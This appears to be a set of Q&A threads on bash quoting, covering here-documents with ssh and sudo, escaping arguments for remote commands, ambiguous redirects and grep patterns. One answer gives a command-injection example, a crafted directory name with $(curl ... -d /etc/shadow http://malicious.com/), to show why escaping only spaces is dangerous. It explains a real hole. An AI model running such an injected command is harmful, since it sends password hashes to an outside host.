When I execute this, I get just empty lines as output
# /bin/bash <<- EOF
while read a
do
echo $a
done < /etc/fstab
EOF
If I copy the content of the here-document into a file and execute it, everything works as expected (I get the content of /etc/fstab).
Could anyone explain why?
UPDATE:
Answering a question about why I would need to pass a here-doc to bash this way, here is what I'm actually trying to do:
ssh user@host /bin/bash <<- EOF
while read f; do
sed -i -e "s/$OLD_VAL/$NEW_VAL/g" $f
done < /tmp/list_of_files
EOF
Sed is complaining that $f is not set
In case someone bumps into this, here is a version that works:
# /bin/bash <<- EOF
while read a
do
echo \$a
done < /etc/fstab
EOF
The variable a is not defined in the parent bash script, so it is substituted with an empty value before the here-document is passed to the child bash. To prevent that substitution, the $ sign must be escaped with "\".
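An alternative to escaping each $ is to quote the here-document delimiter, which disables all expansion in the body; a minimal sketch:
# /bin/bash <<- 'EOF'
while read a
do
echo $a
done < /etc/fstab
EOF
With the delimiter quoted ('EOF'), the parent shell passes the body through verbatim, so $a reaches the child bash intact.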
You don't need a here-document here. If you were writing a script you could do:
#!/bin/bash
while read a
do
echo "$a"
done < /etc/fstab
I do not have enough reputation here to add comments, so I am forced to answer instead.
First, you have multiple levels of shell going on. In your initial example, the syntax for your HERE doc was incorrect, but your edited update is correct. The <<- will remove leading tab characters (but not spaces) from each line of text until your EOF delimiter (which could have been named anything). Using << without the '-' leaves the body's indentation intact and requires the closing delimiter to start in column 0.
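A quick illustration of the tab stripping (the body line below is indented with a literal tab; <<- removes it, plain << would keep it):
cat <<- EOF
	this line starts with a tab in the source, but prints flush left
EOF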
Next, you are using ssh to get your shell from a remote host. This implies that your /tmp/list_of_files must also exist on the remote machine, and that any local shell metacharacter should be escaped to ensure it is passed to the program/location where you actually want it expanded.
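For instance, compare what the remote shell ends up running with and without escaping (hypothetical host):
ssh user@host "echo $HOSTNAME"    # $HOSTNAME expands locally: prints the local hostname
ssh user@host "echo \$HOSTNAME"   # \$ survives to the remote shell: prints the remote hostname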
I do not believe a HEREdoc is necessary when you can pass a complete semicolon-separated one-liner to ssh. This may also afford you some flexibility to let your local shell do some expansion before variables are passed to ssh or your remote shell.
OLD=' '
NEW=$'\t'
ssh -q user@host "for filename in \$(</tmp/list_of_files); do gsed -i.\$(date +%s) -e \"s/$OLD/$NEW/g\" \$filename; done"
Let's not forget the -i is an in-place edit, not a flag to ignore the upper/lower case of our regex match. I like to create backups of my files any time I edit/change them so I have a history if/when anything breaks later.
When I read a Hadoop deploy script, I found the following code:
ssh $HADOOP_SSH_OPTS $slave $"${@// /\\ }"
The "${#// /\\ }" input is a simple shell command (parameter expansion). Why add a $ before this command? What does this $"" mean?
This code is simply buggy: It intends to escape the local script's argument list such that arguments with spaces can be transported over ssh, but it does this badly (missing some kinds of whitespace -- and numerous classes of metacharacters -- in exploitable ways), and uses $"" syntax (performing a translation table lookup) without any comprehensible reason to do so.
The Wrong Thing (aka: What It's Supposed To Do, And How It Fails)
Part 1: Describing The Problem
Passing a series of arguments to SSH does not guarantee that those arguments will come out the way they went in! SSH flattens its argument list to a single string, and transmits only that string to the remote system.
Thus:
# you might try to do this...
ssh remotehost printf '%s\n' "hello world" "goodbye world"
...looks exactly the same to the remote system as:
# but it comes out exactly the same as this
ssh remotehost 'printf %s\n hello world goodbye world'
...thus removing the effect of the quotes. If you want the effect of the first command, what you actually need is something like this:
ssh remotehost "printf '%s\n' \"hello world\" \"goodbye world\""
...where the command, with its quotes, is passed as a single argument to SSH.
Part 2: The Attempted Fix
The syntax "${var//string/replacement}" evaluates to the contents of $var, but with every instance of string replaced with replacement.
The syntax "$#" expands to the full list of arguments given to the current script.
"${#//string/replacement}" expands to the full list of arguments, but with each instance of string in each argument replaced with replacement.
Thus, "${#// /\\ }" expands to the full list of arguments, but with each space replaced with a string that prepends a single backslash to this space.
It thus modifies this:
# would be right as a local command, but not over ssh!
ssh remotehost printf '%s\n' 'hello world' 'goodbye world'
To this:
# ...but with "${@// /\\ }", it becomes this:
ssh remotehost printf '%s\n' 'hello\ world' 'goodbye\ world'
...which SSH munges into this:
# ...which behaves just like this, which actually works:
ssh remotehost 'printf %s\n hello\ world goodbye\ world'
Looks great, right? Except it's not.
Aside: What's the leading $ in $"${@// /\\ }" for?
It's a bug here. It's valid syntax, because $"" has a useful meaning in bash (looking up the string as English text to see if there's a translation to the current user's native language), but there's no legitimate reason to do a translation table lookup here.
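For reference, $"..." is bash's locale-translation quoting: the string is looked up in the current locale's message catalog and replaced by its translation if one exists. With no catalog installed it behaves exactly like ordinary double quotes, which is why the bug is invisible in casual testing:
# without an installed message catalog, these two lines print the same thing
echo "Hello, world"
echo $"Hello, world"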
Why That Code Is Dangerously Buggy
There's a lot more you need to escape than spaces to make something safe for shell evaluation!
Let's say that you were running the following:
# copy directory structure to remote machine
src=/home/someuser/files
while read -r path; do
  ssh "$host" "mkdir -p $path"
done < <(find "$src" -type d -printf '%P\n')
Looks pretty safe, right? But let's say that someuser is sloppy about their file permissions (or malicious), and someone does this:
mkdir $'/home/someuser/files/$(curl\t-X\tPOST\t-d\t/etc/shadow\thttp://malicious.com/)/'
Oh, no! Now, if you run that script with root permissions, you'll get your /etc/shadow sent to malicious.com, for them to try to crack your passwords at their leisure -- and the code given in your question won't help, because it only backslash-escapes spaces, not tabs or newlines, and it doesn't do anything about $() or backticks or other characters that can control the shell.
The Right Thing (Option 1: Consuming Stdin)
A safe and correct way to escape an argument list to be transported over ssh follows:
#!/bin/bash
# tell bash to put a quoted string which will, if expanded by bash, evaluate
# to the original arguments to this script into cmd_str
printf -v cmd_str '%q ' "$@"
# on the remote system, run "bash -s", with the script to run fed on stdin
# this guarantees that the remote shell is bash, which is what printf %q
# quotes content to be parsed by.
ssh "$slave" "bash -s" <<EOF
$cmd_str
EOF
There are some limitations inherent in this approach -- most particularly, it requires the remote command's stdin to be used for script content -- but it's safe even if the remote /bin/sh doesn't support bash extensions such as $''.
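To see what printf %q actually produces, you can inspect cmd_str locally (hypothetical arguments):
$ printf -v cmd_str '%q ' touch '/tmp/file with spaces'
$ echo "$cmd_str"
touch /tmp/file\ with\ spaces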
The Right Thing (Option 2: Using Python)
Unlike both bash and ksh's printf %q, the Python standard library's pipes.quote() (moved in 3.x to shlex.quote()) is guaranteed to generate POSIX-compliant output. We can use it as such:
posix_quote() {
python -c 'import pipes, sys; print " ".join([pipes.quote(x) for x in sys.argv[1:]])' "$@"
}
cmd_str=$(posix_quote "$@")
ssh "$slave" "$cmd_str"
Arguments to the script which contain whitespace need to be surrounded by quotes on the command line.
The ${@// /\\ } will quote this whitespace so that the expansion which takes place next keeps the whitespace as part of the argument for another command.
Anyway, an example is probably in order. Create tst.sh with the line above and make it executable:
echo '#!/bin/bash' > tst.sh
echo 'ssh $HADOOP_SSH_OPTS $slave $"${@// /\\ }"' >> tst.sh
chmod +x tst.sh
Try to run a mkdir command on the remote server (aka slave) for a directory containing spaces, assuming you have access to that server with user id uid:
HADOOP_SSH_OPTS="-l uid" slave=server ./tst.sh mkdir "/tmp/dir with spaces"
Because of the quoting of the whitespace, you'll now have a directory named dir with spaces in /tmp on the server, owned by uid.
Check using ssh uid@server ls /tmp
And if you're in a different country and really want some non-English characters, those are maintained by the surrounding $"...", which is locale-specific.
I am trying to create and use variables inside a heredoc, like this:
#!/bin/bash
sudo su - postgres <<EOF
IP="XYZ"
echo "$IP"
EOF
This doesn't work right: I get a blank line from the echo.
But if I use quotes around EOF like this,
#!/bin/bash
sudo su - postgres <<"EOF"
IP="XYZ"
echo "$IP"
EOF
It works. Can someone please explain this? According to what I read in the man page, the behaviour should be the opposite.
The shell evaluates the unquoted here document and performs variable interpolation before passing it to the command (in your case, sudo). Because IP is not a defined variable in the parent shell, it gets expanded to an empty string.
With quotes, you prevent variable interpolation by the parent shell, and so the shell run by sudo sees and expands the variable.
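If you need a mix, with some values filled in by the parent shell and others by the shell that sudo runs, keep the delimiter unquoted and escape only the dollar signs meant for the inner shell. A minimal sketch (DBNAME is a hypothetical parent-shell variable):
#!/bin/bash
DBNAME="mydb"
sudo su - postgres <<EOF
IP="XYZ"
echo "\$IP $DBNAME"    # \$IP is expanded by the postgres shell; $DBNAME by the parent
EOF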
I used this command in my Bash Shell:
printf $VAR1 >> `printf $VAR2`
and it worked normally. But when I write this into a script file and run it in the shell, it does not work. File "script.sh" contains this:
#!/bin/bash
printf $VAR1 >> `printf $VAR2`
and the output in Shell is:
script.sh: line 2: `printf $VAR2`: ambiguous redirect
I don't know how this is possible, because the command is absolutely the same. And of course, I run the script on the same system and in the same shell window.
Thank you for your help.
There are 3 points worth addressing here:
Shell variables vs. environment variables:
Scripts (unless invoked with . / source) run in a child process that only sees the parent shell's environment variables, not its regular shell variables.
This is what likely happened in the OP's case: $VAR1 and $VAR2 existed as regular shell variables, but not environment variables, so script script.sh didn't see them.
Therefore, for a child process to see a parent shell's shell variables, the parent must export them first, as a result of which they (also) become environment variables: export VAR1=... VAR2=...
Bash's error messages relating to output redirection (>, >>):
If the filename argument of an output redirection is an unquoted command substitution (`...`, or its modern equivalent, $(...)), i.e., the output from a command, Bash reports the error ambiguous redirect in the following cases:
The command output has embedded whitespace, i.e., contains more than one word.
The command output is empty, which is what likely happened in the OP's case.
As an aside: in this case, the error message's wording is unfortunate, because there's nothing ambiguous about a missing filename; it simply cannot work, because files need names.
It is generally advisable to double-quote command substitutions (e.g., >> "$(...)") and also variable references (e.g., "$VAR2"): this allows filenames with embedded whitespace, and, should the output be unexpectedly empty, you'll get the (slightly) more meaningful error message No such file or directory.
Not double-quoting a variable reference or command substitution subjects its value to so-called shell expansions: further, often unintended, interpretation by the shell.
The wisdom of using a command substitution to generate a filename:
Leaving aside that printf $VAR2 is a fragile way to print the value of variable $VAR2 (the robust form again involves double-quoting: printf "$VAR2", or, even more robustly, printf %s "$VAR2" to rule out inadvertent interpretation of escape sequences in the variable value), there is no good reason to employ a command substitution to begin with if all that's needed is a variable's value:
>> "$VAR2" is enough to robustly specify the value of variable $VAR2 as the target filename.
I tried this on my Mac (10.11.1) in a terminal window and it worked fine.
Are you sure your default shell is bash?
echo $SHELL
Did you use export to set your shell vars?
$ export VAR1="UselessData"
$ export VAR2="FileHoldingUselessData"
$ ./script.sh
$ cat FileHoldingUselessData
UselessData$
However, echo does a better job here, since with printf an unquoted $VAR1 is word-split and output stops at the first space. So, with VAR1 set to "Some Useless Data":
$ cat script.sh
#!/bin/bash
echo $VAR1 >> `printf $VAR2`
$ ./script.sh
$ cat FileHoldingUselessData
Some Useless Data
Which leads me to believe you might want to just use echo instead of printf altogether:
#!/bin/bash
echo $VAR1 >> `echo $VAR2`
I don't usually work in bash, but grep could be a really fast solution in this case. I have read a lot of questions on grep and variable assignment in bash, yet I do not see the error. I have tried several flavours of double quotes around $pattern, and used backticks or $(...), but nothing worked.
So here's what I try to do:
I have two files. The first contains several names. Each of them I want to use as a pattern for grep in order to search them in another file. Therefore I loop through the lines of the first file and assign the name to the variable pattern.
This step works as the variable is printed out properly.
But somehow grep does not recognize/interpret the variable. When I substitute "$pattern" with an actual name, everything is fine. Therefore I don't think the problem is the variable assignment, but rather the interpretation of "$pattern" as the string it should represent.
Any help is greatly appreciated!
#!/bin/bash
while IFS='' read -r line || [[ -n $line ]]; do
a=( $line )
pattern="${a[2]}"
echo "Text read from file: $pattern"
var=$(grep "$pattern" 9606.protein.aliases.v10.txt)
echo "Matched Line in Alias is: $var"
done < "$1"
> bash match_Uniprot_StringDB.sh ~/Chromatin_Computation/.../KDM.protein.tb
output:
Text read from file: "UBE2B"
Matched Line in Alias is:
Text read from file: "UTY"
Matched Line in Alias is:
EDIT
The solution drvtiny suggested works. It is necessary to get rid of the double quotes to match the string. Adding the following lines makes the script work.
pattern="${pattern#\"}"
pattern="${pattern%\"}"
Please look at the "-f FILE" option in man grep.
This option does exactly what you need, without any bash loops or other such "hacks" :)
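A sketch of that approach, assuming (from the a[2] in your loop) that the names sit in the third whitespace-separated column of the first file and are wrapped in double quotes:
# build the pattern list on the fly and let grep do the looping;
# -f - makes grep read one pattern per line from stdin
awk '{ gsub(/"/, "", $3); print $3 }' KDM.protein.tb |
    grep -f - 9606.protein.aliases.v10.txt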
And yes, according to the output of your code, you are reading the pattern with its double quotes included. In other words, you read from file ~/Chromatin_Computation/.../KDM.protein.tb this string:
"UBE2B"
But not
UBE2B
as you probably expect.
Maybe you need to remove double quotes on the boundaries of your $pattern?
Try to do this after reading pattern:
pattern=${pattern#\"}
pattern=${pattern%\"}
I'm trying to build a command string to pass an "-e" flag and another variable into another base script being called as a subroutine, and I have run into a strange problem: I'm losing the "-e" portion of the string when I pass it into the subroutine. I created a couple of examples which illustrate the issue; any help?
This works as you would expect:
$echo "-e $HOSTNAME"
-e ops-wfm
This does NOT; we lose the "-e" because it is interpreted as a special qualifier.
$myFlag="-e $HOSTNAME"; echo $myFlag
ops-wfm
Adding the "\" escape character doesn't work either; I get the correct string back with the "\" in front:
$myFlag="\-e $HOSTNAME"; echo $myFlag
\-e ops-wfm
How can I prevent -e being swallowed?
Use double-quotes:
$ myFlag="-e $HOSTNAME"; echo "${myFlag}"
-e myhost.local
I use ${var} rather than $var out of habit as it means that I can add characters after the variable without the shell interpreting them as part of the variable name.
echo may not be the best example here. Most Unix commands will accept -- to mark no more switches.
$ var='-e .bashrc' ; ls -l -- "${var}"
ls: -e .bashrc: No such file or directory
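echo itself is one of the exceptions that does not honor --, so for echo specifically the usual escape hatch is printf, which treats everything after the format string as data:
$ myFlag="-e $HOSTNAME"
$ printf '%s\n' "${myFlag}"
-e myhost.local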
Well, you could put your variable in quotes:
echo "$myFlag"
...making it equivalent to your first example, which, as you say, works just fine.